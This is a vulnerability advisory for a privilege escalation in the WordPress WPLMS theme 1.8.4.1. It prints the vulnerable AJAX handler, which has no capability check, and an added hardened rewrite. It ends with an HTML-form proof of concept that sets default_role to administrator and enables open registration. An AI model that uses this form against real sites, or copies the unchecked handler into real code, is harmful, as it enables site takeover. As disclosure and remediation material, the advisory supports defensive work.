WordPress WPLMS 1.8.4.1 Privilege Escalation

Posted Feb 8, 2015
Authored by Evex

WordPress WPLMS theme version 1.8.4.1 suffers from a privilege escalation vulnerability.

tags | exploit
MD5 | a143e65ca34ec5906d471c2a962e6fc2

------------------------------------------------------------------------------
WordPress WPLMS Theme Privilege Escalation
------------------------------------------------------------------------------

[-] Author: Evex

http://packetstormsecurity.com/user/evex/
twitter: https://twitter.com/Evexola

[-] Theme Link:

http://themeforest.net/item/wplms-learning-management-system/6780226


[-] Affected Version:

Version 1.8.4.1


[-] Vulnerability Description:

The vulnerable code is located in the /includes/func.php
script:


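add_action( 'wp_ajax_import_data', 'import_data' ); // wp_ajax_* hook: fires for any logged-in user
function import_data(){
    // No capability check and no nonce check before acting on the request
    $name = stripslashes($_POST['name']);          // option name chosen by the caller
    $code = base64_decode(trim($_POST['code']));   // option value chosen by the caller
    if(is_string($code))
        $code = unserialize ($code);
    $value = get_option($name);
    if(isset($value)){
        update_option($name,$code);                // writes the caller's value into the named option
    }else{
        echo "Error, Option does not exist !";
    }
    die();
}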


Because the handler is registered on the wp_ajax_import_data hook and performs
no capability check, any logged-in user can call import_data. This allows
modifying WordPress settings and adding a new administrator, which can lead to
a full takeover of the site.
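
A hardened version of the handler above, as an added example (not the theme's code and not the vendor's fix). The handler name, the nonce action and field names, and the allowlisted option names are assumptions chosen for illustration.

```php
<?php
// Added example: hardened variant of the import_data AJAX handler.
// Assumptions (not from the theme): the handler name, the nonce action
// 'wplms_import_data', the nonce field 'security', and the allowlisted names.

add_action( 'wp_ajax_import_data', 'wplms_import_data_hardened' );
// No wp_ajax_nopriv_ hook is registered, so unauthenticated requests never reach it.

function wplms_import_data_hardened() {
    // 1. Authorization: the wp_ajax_* hook only proves the caller is logged in.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient privileges.', 403 );
    }

    // 2. CSRF: require a nonce issued for this action.
    if ( ! check_ajax_referer( 'wplms_import_data', 'security', false ) ) {
        wp_send_json_error( 'Invalid nonce.', 403 );
    }

    // 3. Only the theme's own options may be imported (hypothetical names),
    //    never core options such as default_role or users_can_register.
    $allowed = array( 'wplms_theme_settings', 'wplms_layout_settings' );
    $name    = ( isset( $_POST['name'] ) && is_string( $_POST['name'] ) )
        ? sanitize_key( wp_unslash( $_POST['name'] ) ) : '';
    if ( ! in_array( $name, $allowed, true ) ) {
        wp_send_json_error( 'Option not importable.', 400 );
    }

    // 4. Decode as JSON instead of unserialize(): JSON cannot instantiate PHP objects.
    $code = ( isset( $_POST['code'] ) && is_string( $_POST['code'] ) )
        ? wp_unslash( $_POST['code'] ) : '';
    $raw  = base64_decode( trim( $code ), true ); // strict mode: false on invalid input
    $data = ( false === $raw ) ? null : json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        wp_send_json_error( 'Malformed import data.', 400 );
    }

    // 5. get_option() returns false for a missing option, so isset() on its
    //    result (as in the original) is always true; compare against false.
    if ( false === get_option( $name ) ) {
        wp_send_json_error( 'Option does not exist.', 404 );
    }

    update_option( $name, $data );
    wp_send_json_success();
}
```

Each wp_send_json_error() call terminates the request, so a failed check never falls through to update_option().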


[-] Proof of Concept:


(Must be submitted as a logged-in user)
OPTION:
admin_email, default_role, users_can_register

Value (must be serialized, then base64-encoded):
users_can_register (0,1)

default_role (administrator, author, editor...)

admin_email (whatever@duh.com)

<form action="http://domain.tld/wp-admin/admin-ajax.php?action=import_data"
method="post" >
<input type="hidden" name="name" value="OPTION" />
<input type="hidden" name="code" value="VALUE" />
<button type="submit" >Submit</button>
</form>